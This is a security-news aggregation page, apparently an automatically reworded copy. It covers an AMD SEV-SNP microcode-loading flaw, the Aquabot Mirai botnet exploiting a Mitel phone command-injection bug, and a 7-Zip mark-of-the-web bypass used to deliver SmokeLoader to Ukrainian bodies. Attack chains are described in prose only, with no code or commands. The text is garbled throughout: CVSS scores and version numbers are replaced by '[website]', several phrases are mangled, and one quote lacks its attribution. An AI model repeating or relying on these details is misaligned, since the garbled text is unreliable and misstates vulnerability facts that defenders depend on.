Russian Cybercrime Groups Exploiting 7-Zip Flaw to Bypass Windows MotW Protections - Related to flaw, sev-snp, russian, protections, cve-2024-41710

AMD SEV-SNP Vulnerability Allows Malicious Microcode Injection with Admin Access

A security vulnerability has been disclosed in AMD's Secure Encrypted Virtualization (SEV) that could permit an attacker to load a malicious CPU microcode under specific conditions.

The flaw, tracked as CVE-2024-56161, carries a CVSS score of [website] out of [website], indicating high severity.

"Improper signature verification in AMD CPU ROM microcode patch loader may allow an attacker with local administrator privilege to load malicious CPU microcode resulting in loss of confidentiality and integrity of a confidential guest running under AMD SEV-SNP," AMD presented in an advisory.

The chipmaker credited Google security researchers Josh Eads, Kristoffer Janke, Eduardo Vela, Tavis Ormandy, and Matteo Rizzo for discovering and reporting the flaw on September 25, 2024.

SEV is a security feature that uses a unique key per virtual machine to isolate virtual machines (VMs) and the hypervisor from one another. SNP, which stands for Secure Nested Paging, incorporates memory integrity protections to create an isolated execution environment and safeguard against hypervisor-based attacks.

"SEV-SNP introduces several additional optional security enhancements designed to support additional VM use models, offer stronger protection around interrupt behavior, and offer increased protection against in recent times disclosed side channel attacks," .

In a separate bulletin, Google noted that CVE-2024-56161 is the result of an insecure hash function in the signature validation for microcode updates, which opens the door to a scenario where an adversary could compromise confidential computing workloads.

The organization has also released a test payload to demonstrate the vulnerability, but additional technical details have been withheld for another month so as to give enough time for the fix to be propagated across the "deep supply chain."

Besieged by scammers seeking to phish user accounts over the telephone, Apple and Google frequently ...

A Russian-speaking cybercrime gang known as Crazy Evil has been linked to over 10 active social medi...

As the gateways to corporate networks, VPNs are an attractive target for attackers seeking access to...

New Aquabot Botnet Exploits CVE-2024-41710 in Mitel Phones for DDoS Attacks

A Mirai botnet variant dubbed Aquabot has been observed actively attempting to exploit a medium-severity security flaw impacting Mitel phones in order to ensnare them into a network capable of mounting distributed denial-of-service (DDoS) attacks.

The vulnerability in question is CVE-2024-41710 (CVSS score: [website], a case of command injection in the boot process that could allow a malicious actor to execute arbitrary commands within the context of the phone.

It affects Mitel 6800 Series, 6900 Series, 6900w Series SIP Phones, and Mitel 6970 Conference Unit. It was addressed by Mitel in mid-July 2024. A proof-of-concept (PoC) exploit for the flaw became publicly available in August.

Outside of CVE-2024-41710, some of the other vulnerabilities targeted by the botnet include CVE-2018-10561, CVE-2018-10562, CVE-2018-17532, CVE-2022-31137, CVE-2023-26801, and a remote code execution flaw targeting Linksys E-series devices.

"Aquabot is a botnet that was built off the Mirai framework with the ultimate goal of distributed denial-of-service (DDoS)," Akamai researchers Kyle Lefton and Larry Cashdollar noted. "It has been known since November 2023."

The web infrastructure organization expressed it detected active exploitation attempts against CVE-2024-41710 since early January 2025, with the attacks mirroring a "payload almost identical to the PoC" to deploy the botnet malware.

The attack involves executing a shell script that, in turn, uses the "wget" command to retrieve Aquabot for different CPU architectures.

The Aquabot Mirai variant spotted in the attack has been assessed to be a third iteration of the malware, sporting a novel "report_kill" function that reports back to the command-and-control (C2) server when a kill signal is caught on the infected device. However, sending this information hasn't been found to elicit any response from the server to date.

This new version, besides triggering C2 communication upon detecting certain signals, renames itself to "[website]" to avoid attracting attention and is programmed to terminate processes that match certain requirements, such as local shells. It's suspected that the signal handling aspects are likely incorporated to craft more stealthy variants or detect malicious activity from competing botnets.

There is some evidence suggesting that the threat actors behind Aquabot are offering the network of compromised hosts as a DDoS service on Telegram under the monikers Cursinq Firewall, The Eye Services, and The Eye Botnet.

The development is a sign that Mirai continues to plague a wide range of internet-connected devices that often lack proper security aspects, or have either reached end-of-life or left accessible with default configuration and passwords, making them low-hanging fruits ripe for exploitation and a key conduit for DDoS attacks.

"Threat actors commonly claim that the botnet is used only for DDoS mitigation testing purposes to try to mislead researchers or law enforcement," the researchers stated.

"Threat actors will claim it's just a PoC or something educational, but a deeper analysis demonstrates that they are in fact advertising DDoS as a service, or the owners are boasting about running their own botnet on Telegram."

BeyondTrust has revealed it completed an investigation into a recent cybersecurity incident that targeted some of the organization's Remote Support SaaS in......

In an effort to blend in and make their malicious traffic tougher to block, hosting firms catering to cybercriminals in China and Russia increasingly ......

The US Cybersecurity and Infrastructure Security Agency (CISA) is warning that Contec CMS8000 devices, a widely used healthcare patient monitoring dev......

Russian Cybercrime Groups Exploiting 7-Zip Flaw to Bypass Windows MotW Protections

A lately patched security vulnerability in the 7-Zip archiver tool was exploited in the wild to deliver the SmokeLoader malware.

The flaw, CVE-2025-0411 (CVSS score: [website], allows remote attackers to circumvent mark-of-the-web (MotW) protections and execute arbitrary code in the context of the current user. It was addressed by 7-Zip in November 2024 with version [website].

"The vulnerability was actively exploited by Russian cybercrime groups through spear-phishing campaigns, using homoglyph attacks to spoof document extensions and trick clients and the Windows Operating System into executing malicious files," Trend Micro security researcher Peter Girnus stated.

It's suspected that CVE-2025-0411 was likely weaponized to target governmental and non-governmental organizations in Ukraine as part of a cyber espionage campaign set against the backdrop of the ongoing Russo-Ukrainian conflict.

MotW is a security feature implemented by Microsoft in Windows to prevent the automatic execution of files downloaded from the internet without performing further checks through Microsoft Defender SmartScreen.

CVE-2025-0411 bypasses MotW by double archiving contents using 7-Zip, [website], creating an archive and then an archive of the archive to conceal the malicious payloads.

"The root cause of CVE-2025-0411 is that prior to version [website], 7-Zip did not properly propagate MotW protections to the content of double-encapsulated archives," Girnus explained. "This allows threat actors to craft archives containing malicious scripts or executables that will not receive MotW protections, leaving Windows people vulnerable to attacks."

Attacks leveraging the flaw as a zero-day were first detected in the wild on September 25, 2024, with the infection sequences leading to SmokeLoader, a loader malware that has been repeatedly used to target Ukraine.

The starting point is a phishing email that contains a specially-crafted archive file that, in turn, employs a homoglyph attack to pass off the inner ZIP archive as a Microsoft Word document file, effectively triggering the vulnerability.

"The use of these compromised email accounts lend an air of authenticity to the emails sent to targets, manipulating potential victims into trusting the content and their senders," Girnus pointed out.

This approach leads to the execution of an internet shortcut (.URL) file present within the ZIP archive, which points to an attacker-controlled server hosting another ZIP file. The newly downloaded ZIP contains the SmokeLoader executable that's disguised as a PDF document.

At least nine Ukrainian government entities and other organizations have been assessed to be impacted by the campaign, including the Ministry of Justice, Kyiv Public Transportation Service, Kyiv Water Supply business, and City Council.

In light of the active exploitation of CVE-2025-0411, individuals are recommended to enhancement their installations to the latest version, implement email filtering functions to block phishing attempts, and disable the execution of files from untrusted findings.

"One interesting takeaway we noticed in the organizations targeted and affected in this campaign is smaller local government bodies," Girnus showcased.

"These organizations are often under intense cyber pressure yet are often overlooked, less cyber-savvy, and lack the resources for a comprehensive cyber strategy that larger government organizations have. These smaller organizations can be valuable pivot points by threat actors to pivot to larger government organizations."

Microsoft today unleashed updates to plug a whopping 161 security vulnerabilities in Windows and rel...

Targeted attacks on Twilio and Cloudflare employees are tied to a massive phishing campaign that res...

The FBI joined authorities across Europe last week in seizing domain names for Cracked and Nulled, E...